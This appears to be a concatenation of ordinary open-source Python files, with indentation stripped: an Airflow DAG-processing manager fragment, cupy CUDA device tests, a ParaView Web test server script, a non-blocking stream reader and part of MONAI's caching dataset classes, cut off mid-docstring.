last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, stat in self._file_stats.items()
if stat.run_count == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(0, 0, None, None, 0)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks haven't heartbeated for too long
and update the current zombie list.
"""
now = timezone.utcnow()
zombies: List[SimpleTaskInstance] = []
if not self._last_zombie_query_time or \
(now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval:
# to avoid circular imports
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
limit_dttm = timezone.utcnow() - timedelta(
seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
tis = (
session.query(TI)
.join(LJ, TI.job_id == LJ.id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
).all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti in tis:
sti = SimpleTaskInstance(ti)
self.log.info(
"Detected zombie job with dag_id %s, task_id %s, and execution date %s",
sti.dag_id, sti.task_id, sti.execution_date.isoformat())
zombies.append(sti)
self._zombies = zombies
def _kill_timed_out_processors(self):
"""
Kill any file processors that timeout to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
file_path, processor.pid, processor.start_time.isoformat())
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove ater Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if child_processes:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
def emit_metrics(self):
"""
Emmit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = (timezone.utcnow() - self._parsing_start_time).total_seconds()
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge('dag_processing.import_errors',
sum(stat.import_errors for stat in self._file_stats.values()))
# TODO: Remove before Airflow 2.0
Stats.gauge('collect_dags', parse_time)
Stats.gauge('dagbag_import_errors', sum(stat.import_errors for stat in self._file_stats.values()))
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
|
test_device.py
|
import threading
import unittest
import pytest
import six
from cupy import cuda
from cupy import testing
class TestDeviceComparison(unittest.TestCase):
def check_eq(self, result, obj1, obj2):
if result:
assert obj1 == obj2
assert obj2 == obj1
assert not (obj1 != obj2)
assert not (obj2 != obj1)
else:
assert obj1 != obj2
assert obj2 != obj1
assert not (obj1 == obj2)
assert not (obj2 == obj1)
def test_equality(self):
self.check_eq(True, cuda.Device(0), cuda.Device(0))
self.check_eq(True, cuda.Device(1), cuda.Device(1))
self.check_eq(False, cuda.Device(0), cuda.Device(1))
self.check_eq(False, cuda.Device(0), 0)
self.check_eq(False, cuda.Device(0), None)
self.check_eq(False, cuda.Device(0), object())
def test_lt_device(self):
assert cuda.Device(0) < cuda.Device(1)
assert not (cuda.Device(0) < cuda.Device(0))
assert not (cuda.Device(1) < cuda.Device(0))
def test_le_device(self):
assert cuda.Device(0) <= cuda.Device(1)
assert cuda.Device(0) <= cuda.Device(0)
assert not (cuda.Device(1) <= cuda.Device(0))
def test_gt_device(self):
assert not (cuda.Device(0) > cuda.Device(0))
assert not (cuda.Device(0) > cuda.Device(0))
assert cuda.Device(1) > cuda.Device(0)
def test_ge_device(self):
assert not (cuda.Device(0) >= cuda.Device(1))
assert cuda.Device(0) >= cuda.Device(0)
assert cuda.Device(1) >= cuda.Device(0)
def check_comparison_other_type(self, obj1, obj2):
with pytest.raises(TypeError):
obj1 < obj2
with pytest.raises(TypeError):
obj1 <= obj2
with pytest.raises(TypeError):
obj1 > obj2
with pytest.raises(TypeError):
obj1 >= obj2
with pytest.raises(TypeError):
obj2 < obj1
with pytest.raises(TypeError):
obj2 <= obj1
with pytest.raises(TypeError):
obj2 > obj1
with pytest.raises(TypeError):
obj2 >= obj1
@unittest.skipIf(
six.PY2, 'Python 2 comparison result of objects is arbitrary')
def test_comparison_other_type(self):
self.check_comparison_other_type(cuda.Device(0), 0)
self.check_comparison_other_type(cuda.Device(0), 1)
self.check_comparison_other_type(cuda.Device(1), 0)
self.check_comparison_other_type(cuda.Device(1), None)
self.check_comparison_other_type(cuda.Device(1), object())
@testing.gpu
class TestDeviceAttributes(unittest.TestCase):
def test_device_attributes(self):
d = cuda.Device()
attributes = d.attributes
assert isinstance(attributes, dict)
assert all(isinstance(a, int) for a in attributes.values())
# test a specific attribute that would be present on any supported GPU
assert 'MaxThreadsPerBlock' in attributes
def test_device_attributes_error(self):
with pytest.raises(cuda.runtime.CUDARuntimeError):
# try to retrieve attributes from a non-existent device
cuda.device.Device(cuda.runtime.getDeviceCount()).attributes
@testing.gpu
class TestDeviceHandles(unittest.TestCase):
def _check_handle(self, func):
handles = [func(), None, None]
def _subthread():
handles[1] = func()
handles[2] = func()
t = threading.Thread(target=_subthread)
t.start()
t.join()
assert handles[0] is not None
assert handles[0] != handles[1]
assert handles[1] == handles[2]
def test_cublas_handle(self):
self._check_handle(cuda.get_cublas_handle)
def test_cusolver_handle(self):
self._check_handle(cuda.device.get_cusolver_handle)
def test_cusolver_sp_handle(self):
self._check_handle(cuda.device.get_cublas_handle)
def test_cusparse_handle(self):
self._check_handle(cuda.device.get_cusparse_handle)
|
TestPythonParaViewWeb.py
|
#/usr/bin/env python
# Global python import
import exceptions, traceback, logging, random, sys, threading, time, os
# Update python path to have ParaView libs
build_path='/Volumes/SebKitSSD/Kitware/code/ParaView/build-ninja'
sys.path.append('%s/lib'%build_path)
sys.path.append('%s/lib/site-packages'%build_path)
# ParaView import
from vtk.web import server
from paraview.vtk import *
from paraview.web import wamp as pv_wamp
#------------------------------------------------------------------------------
# InLine protocol
#------------------------------------------------------------------------------
class TestProtocol(pv_wamp.PVServerProtocol):
dataDir = None
authKey = "vtkweb-secret"
fileToLoad = None
groupRegex = "[0-9]+\\."
excludeRegex = "^\\.|~$|^\\$"
@staticmethod
def updateArguments(options):
TestProtocol.dataDir = options.dataDir
TestProtocol.authKey = options.authKey
TestProtocol.fileToLoad = options.fileToLoad
TestProtocol.groupRegex = options.groupRegex
TestProtocol.excludeRegex = options.excludeRegex
def initialize(self):
from paraview import simple
from paraview.web import protocols as pv_protocols
# Bring used components
self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileListing(TestProtocol.dataDir, "Home", TestProtocol.excludeRegex, TestProtocol.groupRegex))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebRemoteConnection())
# Update authentication key to use
self.updateSecret(TestProtocol.authKey)
#------------------------------------------------------------------------------
# ParaView Test default arguments
#------------------------------------------------------------------------------
class WebArguments(object):
def __init__(self, webDir = None):
self.content = webDir
self.port = 8080
self.host = 'localhost'
self.debug = 0
self.timeout = 120
self.nosignalhandlers = True
self.authKey = 'vtkweb-secret'
self.uploadDir = ""
self.testScriptPath = ""
self.baselineImgDir = ""
self.useBrowser = ""
self.tmpDirectory = ""
self.testImgFile = ""
self.forceFlush = False
self.dataDir = '.'
self.groupRegex = "[0-9]+\\."
self.excludeRegex = "^\\.|~$|^\\$"
self.fileToLoad = None
def __str__(self):
return "http://%s:%d/%s" % (self.host, self.port, self.content)
#------------------------------------------------------------------------------
# Start server
#------------------------------------------------------------------------------
def start():
args = WebArguments('%s/www' % build_path)
TestProtocol.updateArguments(args)
server.start_webserver(options=args, protocol=TestProtocol)
def start_thread():
thread = threading.Thread(target=start)
print ("Starting thread")
thread.start()
for i in range(20):
print ("Working... %ds" % (i*5))
time.sleep(5)
thread.join()
print ("Done")
#------------------------------------------------------------------------------
# Main
#------------------------------------------------------------------------------
if __name__ == "__main__":
start_thread()
|
nonblocking_stream_reader.py
|
# idea from http://eyalarubas.com/python-subproc-nonblock.html
from queue import Queue, Empty
from threading import Thread
class NonBlockingStreamReader:
def __init__(self, stream):
self._stream = stream
self._queue = Queue()
self._thread = None
self.closed = True
def start(self, push_callback=None):
self.closed = False
def _worker():
while True:
line = self._stream.readline()
if line:
if push_callback:
push_callback(line)
self._queue.put(line)
else:
self.closed = True
raise RuntimeError("line is empty")
self._thread = Thread(target=_worker)
self._thread.setDaemon(True)
self._thread.setName("NonBlockingStreamReader of %s" % repr(self._stream))
self._thread.start()
return self
def readline(self, timeout=None):
try:
return self._queue.get(block=timeout is not None, timeout=timeout)
except Empty:
return None
|
dataset.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.serialization import DEFAULT_PROTOCOL
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import SUPPORTED_PICKLE_MOD, convert_tables_to_dicts, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform
from monai.utils import MAX_SEED, ensure_tuple, get_seed, look_up_option, min_version, optional_import
from monai.utils.misc import first
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependant transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependant parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
The input data must be a list of file paths and will hash them as cache keys.
When loading persistent cache content, it can't guarantee the cached data matches current
transform chain, so please make sure to use exactly the same non-random transforms and the
args as the cache content, otherwise, it may cause unexpected errors.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
pickle_module: str = "pickle",
pickle_protocol: int = DEFAULT_PROTOCOL,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
pickle_module: string representing the module used for pickling metadata and objects,
default to `"pickle"`. due to the pickle limitation in multi-processing of Dataloader,
we can't use `pickle` as arg directly, so here we use a string name instead.
if want to use other pickle module at runtime, just register like:
>>> from monai.data import utils
>>> utils.SUPPORTED_PICKLE_MOD["test"] = other_pickle
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save,
and ``monai.data.utils.SUPPORTED_PICKLE_MOD``.
pickle_protocol: can be specified to override the default protocol, default to `2`.
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
self.pickle_module = pickle_module
self.pickle_protocol = pickle_protocol
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependant on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(
obj=_item_transformed,
f=temp_hash_file,
pickle_module=look_up_option(self.pickle_module, SUPPORTED_PICKLE_MOD),
pickle_protocol=self.pickle_protocol,
)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
"""
Extension of `PersistentDataset`, tt can also cache the result of first N transforms, no matter it's random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
pickle_module: str = "pickle",
pickle_protocol: int = DEFAULT_PROTOCOL,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
pickle_module: string representing the module used for pickling metadata and objects,
default to `"pickle"`. due to the pickle limitation in multi-processing of Dataloader,
we can't use `pickle` as arg directly, so here we use a string name instead.
if want to use other pickle module at runtime, just register like:
>>> from monai.data import utils
>>> utils.SUPPORTED_PICKLE_MOD["test"] = other_pickle
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save,
and ``monai.data.utils.SUPPORTED_PICKLE_MOD``.
pickle_protocol: can be specified to override the default protocol, default to `2`.
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save.
"""
super().__init__(
data=data,
transform=transform,
cache_dir=cache_dir,
hash_func=hash_func,
pickle_module=pickle_module,
pickle_protocol=pickle_protocol,
)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the N element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the N transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`LMDBDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(
data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func, pickle_protocol=pickle_protocol
)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
Check the LMDB cache and write the cache if needed. py-lmdb doesn't have a good support for concurrent write.
This method can be used with multiple processes, but it may have a negative impact on the performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
if the item is not found in the lmdb file, resolves to the persistent cache default behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
So to improve the caching efficiency, please always put as many as possible non-random transforms
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
and the outcome not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares cache content in the main process before
the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process
during training. it may take a long time to prepare cache content according to the size of expected cache data.
So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
copy_cache: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
